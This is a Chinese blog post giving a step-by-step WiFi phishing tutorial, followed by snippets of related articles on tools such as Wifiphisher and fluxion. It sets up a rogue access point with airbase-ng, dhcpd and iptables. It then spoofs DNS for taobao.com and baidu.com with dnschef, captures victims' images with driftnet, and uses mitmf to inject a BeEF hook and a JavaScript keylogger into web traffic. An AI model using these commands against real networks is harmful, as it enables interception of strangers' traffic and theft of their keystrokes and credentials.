WiFi钓鱼

最新推荐文章于 2024-10-26 11:32:09 发布
原创 最新推荐文章于 2024-10-26 11:32:09 发布 · 449 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

WiFi钓鱼

建立热点

工具:isc-dhcp-server  ;Aircrack-ng套件;iptables

建立过程:

首先写dhcp配置文件/etc/dhcp/dhcpd.conf 

写入如下内容:

authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name-servers 10.0.0.1;

range 10.0.0.10 10.0.0.100;

}

这里以10.0.0.1作为网关和dns服务器地址。

然后我们处理无线网卡

ifconfig wlan1 down           #wlan1修改成你的网卡
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1

上述命令可以防止出现:Error: Got channel -1, expected a value > 0.

然后用airbase建立热点

airbase-ng -e Fishing -c 11 mon0

热点的网络流量会被虚拟到at0这块网卡上面

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

打开ip转发

echo 1 > /proc/sys/net/ipv4/ip_forward

开启dhcp

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start

然后可以试着用手机连接,应该可以连上但上不了网

于是配置NAT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度

劫持DNS

工具:dnschef

过程:

dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53

上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。显然这只是个“代理”并没有劫持的功效

于是我们进化:

dnschef --fakedomains=taobao.com,baidu.com --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 210.73.64.1#53

把淘宝和百度解析到本机了。

 

图片嗅探

这是一个很好玩的功能

工具:driftnet

过程:

driftnet -i at0

单击图片保存到/

当然可以开启 Adjunct mode:

driftnet -i at0 -a

直接保存图片并显示文件名。

 

 

劫持Web流量

工具:BEEF;mitmf;iptables

过程:

先把80端口的流量劫持走(这里10000是mitmf默认监听端口)

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

然后打开mitmf

mitmf -i at0 --replace --search-str aaaaa  --replace-str bbbbb#把所有网页中的aaaaa替换成bbbbb
mitmf -i at0 --inject --js-url http://10.0.0.1:3000/hook.js --jskeylogger

mitmf在这里注入了js键盘记录器

posted @ 2018-01-10 19:22 journeyIT 阅读( ...) 评论( ...) 编辑 收藏
journey_IT
关注
Wifiphisher —— 非常非常非常流氓的 WIFI 网络钓鱼框架
weixin_40791881的博客
02-25 3662
编者注:这是一个非常流氓的 WIFI 网络钓鱼工具,甚至可能是非法的工具(取决于你的使用场景)。在没有事先获得许可的情况下使用 Wifiphisher 攻击基础网络设施将被视为非法活动。使用时请遵守相应地区的法律!!! Wifiphisher 是一个很流氓的无线路由 Access Point 框架,用于进行 Wi-Fi 安全测试。渗透测试人员可以使用 Wifiphisher 执行有针对性的 Wi...
fluxion Wifi 钓鱼汉语页面.zip
02-02
在"fluxion Wifi 钓鱼汉语页面.zip"这个压缩包中,我们可以推测它包含了一些针对中文用户的定制化钓鱼页面。这些页面可能设计得与常见的Wi-Fi登录界面非常相似,比如酒店、机场或咖啡馆的公共Wi-Fi登录页,以此来...
wifipumpkin3 WiFi钓鱼工具
weixin_43977912的博客
10-08 2729
简介 wifipumpkin3是用Python编写wifi钓鱼攻击强大框架 可以快速方便的搭建一个钓鱼wifi,进行钓鱼或中间人攻击,免去了手动搭建环境的繁琐步骤 支持的攻击种类有: 恶意访问点攻击 中间人攻击 死角接入点攻击 额外的captiveflask模板 DNS劫持 俘虏门户攻击 (captiveflask) 拦截,检查,修改和重放网络流量 WiFi网络扫描 DNS监控服务 凭证收集 透明代理 LLMNR,NBT-NS和MDNS 投毒(Responder3) and more! 安装 使用环境:ka
Ubuntu Wifipumpkin3 WiFi钓鱼工具,应该适用于绝大多数的Debian系的linux 发行版
日拱一卒,功不唐捐
02-23 1535
我们安装失败的大部分原因是因为安装依赖的时候网络的问题。 步骤1 安装依赖 sudo apt install python3.7-dev libssl-dev libffi-dev build-essential python3.7 这里官网给的是3.7 我们使用的可能是更高版本,如果安装了Python,那么执行 sudo apt install libssl-dev libffi-dev build-essential 步骤2 下载文件 可以使用 git git clone https://
自动化WiFI钓鱼工具——WiFiPhisher源码解读
流风回雪的博客
10-12 1532
http://blog.youkuaiyun.com/cd_xuyue/article/details/48054675
实例二——Fluxion-钓鱼破解WiFi笔记( 2.4GHz网络)
热门推荐
weixin_42345596的博客
06-27 1万+
Fluxion-钓鱼破解WiFi( 2.4GHz网络) 1.安装fluxion 解压安装包,可以看见桌面上出现了fluxion-master,进入之后运行./fluxion.sh -i安装依赖包; 安装完成所有的依赖包 这里选17中文模式 然后选择1对2.4GHz进行抓包 可以看到和airodump-ng一样的功能,这里也是按两下q退出,这里带颜色说明有客户端连接,没带颜色说明没有客户端连接 开始钓鱼 选择25进行钓鱼 选择2进行跳过,如果这里选择完出现 恢复攻击 重置攻击 这里一定选择重置
基于ESP8266的“WIFI杀手”与“WIFI钓鱼”实现.rar
06-20
本次课程设计主要模拟了“WIFI 杀手”和“WIFI 钓鱼”两种常见的网络欺骗手段,这 两种网络欺骗主要可以使用户连接不了 WIFI,诱使其连接欺骗者伪造的 WIFI 从而获取用户 账号及密码,本次课程设计将从原理、实现...
wifi钓鱼固件esp8266-fishattack.zip
04-08
WiFi钓鱼固件ESP8266-FishAttack是一款专门针对ESP8266微控制器的定制固件,设计用于网络安全测试和教育目的。ESP8266是一种经济实惠且功能强大的Wi-Fi模块,广泛应用于物联网(IoT)设备的开发。FishAttack固件将ESP...
ESP_Fishing:ESP82266自动化WiFi密码钓鱼
03-12
ESP_钓鱼 视频展示 说明 ...需要使用魔改SDK否则攻击帧会被SDK忽略(SDK去群里下载吧有时间上传网盘) 基于wifi_link_tool库开发(给个Star呗) ...点击“点击进入自动化WiFi钓鱼配置” 扫描网络 选择攻击WiFi 指示灯
基于python+flask的wifi钓鱼页面-毕业设计源码+使用文档(高分优秀项目).zip
04-14
基于python+flask的wifi钓鱼页面-毕业设计源码+使用文档(高分优秀项目).zip 该项目是个人高分毕业设计项目源码,已获导师指导认可通过,答辩评审分达到97分,在window10/11测试环境严格调试,下载即用,确保可以...
ESP8266wifi模块固件
03-29
ESP8266wifi模块固件下载工具
WIFI钓鱼热点
RFZ_322的博客
04-06 1万+
在本教程中,我们创建了一个由恶意Wi-Fi接入点提供的网络钓鱼页面。如果受害者在此页面中输入其详细信息,则将直接发送给您
无线攻防之钓鱼无线攻击
baijiaofei的博客
11-01 4599
WIFI钓鱼之无线攻击
使用WifiPhisher进行WiFi开发
w1304099880的博客
10-26 4300
你好朋友!今天我们将使用非常棒的工具“WIFIphisher”演示WIFI-网络钓鱼攻击,请阅读其描述以获取更多详细信息。 Wifiphisher是一种安全工具,可以针对WiFi客户端安装自动受害者定制的网络钓鱼攻击,以获取凭据或使用恶意软件感染受害者。它主要是一种社会工程攻击,与其他方法不同,它不包括任何强制攻击。这是从强制门户网站和第三方登录页面(例如社交网络)或WPA / WPA...
Liunx就该这么学第20天(DNS)
Luckily的博客
05-22 400
DNS
巴扎嘿的小研究-kali进行wifi爆破及钓鱼
weixin_43183608的博客
05-06 3881
wifi爆破及钓鱼及用wireshark抓握手包
wifiphisher 钓鱼工具的使用
weixin_43845335的博客
01-27 6073
wifiphisher 钓鱼工具的使用 一、简介 Wifiphisher是一个安全工具,具有安装快速、自动化搭建的优点,利用它搭建起来的网络钓鱼攻击WiFi可以轻松获得密码和其他凭证。与其它(网络钓鱼)不同,这是社会工程攻击,不包含任何的暴力破解,它能轻松获得门户网站和第三方登陆页面的证书或WPA/WPA2的密钥。 wifiphisher在kail linux 上工作,并获得了GPL许可的认可 ...
十大顶级反网络钓鱼工具和服务(非常详细),零基础入门到精通,看这一篇就够了
2302_76672693的博客
10-26 1527
十大顶级反网络钓鱼工具和服务(非常详细),零基础入门到精通,看这一篇就够了
第13章 使用Bind提供域名解析服务
weixin_34361881的博客
08-13 637
章节简述: 本章节将让您理解DNS服务程序的原理,学习正向解析与反向解析实验,掌握DNS主服务器、从服务器、缓存服务器的部署方法。 够熟练配置区域信息文件与区域数据文件,以及通过使用分离解析技术让不同来源的用户得到更合适的解析结果。 DNS服务作为互联网的基础设施,我们还可以配置BIND服务程序支持TSIG安全加密传输机制,从而保障解析数据不被嗅探监听。   本章目录结构 1...
ubuntu wifi钓鱼
最新发布
03-20
### 设置或检测 WiFi 钓鱼攻击的方法 #### 工具准备 为了在 Ubuntu 系统上实现 WiFi 钓鱼攻击或对其进行检测,通常需要用到一些网络协议分析工具以及无线网络管理工具。例如 Wireshark 是一种强大的网络协议分析器[^2],可用于捕获和分析网络流量。 #### 实现 WiFi 钓鱼攻击的步骤概述 WiFi 钓鱼攻击的核心在于创建一个伪装成合法热点的虚假接入点 (AP),并诱导目标连接到此 AP 后窃取其敏感数据。以下是可能的技术手段: 1. **配置虚拟无线网卡** 使用 `airmon-ng` 命令启动监听模式来模拟一个伪造的无线接入点。 ```bash sudo airmon-ng start wlan0 ``` 2. **建立假热点** 利用 Hostapd 创建一个与真实热点名称相同的 SSID 来欺骗用户。 编辑 `/etc/hostapd/hostapd.conf` 文件如下: ```plaintext interface=wlan0mon driver=nl80211 ssid=FreePublicWifi hw_mode=g channel=6 macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 ``` 运行 Hostapd 并指定上述配置文件: ```bash sudo hostapd /etc/hostapd/hostapd.conf ``` 3. **拦截 HTTP 流量** 结合 DNS Spoofing 技术重定向用户的请求至恶意页面收集凭证等信息。可借助 Ettercap 完成 ARP 欺骗及后续操作。 4. **日志记录与数据分析** 对整个过程中的通信行为进行监控记录以便进一步研究利用价值高的情报资料。 #### 检测 WiFi 钓鱼攻击的方式 对于防御方面,则主要依赖于主动扫描周围环境是否存在可疑信号源以及教育员工提高警惕意识等方面工作开展起来比较复杂些;但从技术角度来看,可以通过部署入侵检测系统 IDS/IPS 设备或者定期执行专项审计任务等方式加强防护力度。 ##### 使用 Wireshark 捕捉异常包 通过过滤特定类型的帧如 Beacon Frame 和 Probe Response Frame 查找不符合常规规律之处进而判断是否有潜在威胁存在其中。 ##### 自动化脚本编写实例 下面给出一段简单的 Python 脚本来演示如何基于 Scapy 库构建基础版探测机制: ```python from scapy.all import * def packet_handler(pkt): if pkt.haslayer(Dot11Beacon): # 只处理信标帧 print(f"Detected AP with SSID {pkt.info.decode()}") sniff(iface="wlan0", prn=packet_handler, store=False) ``` #### 注意事项 任何未经授权擅自实施此类活动均属违法行为,请务必遵循当地法律法规,在授权范围内合理使用相关技能和技术资源完成相应职责范围内的工作任务即可[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值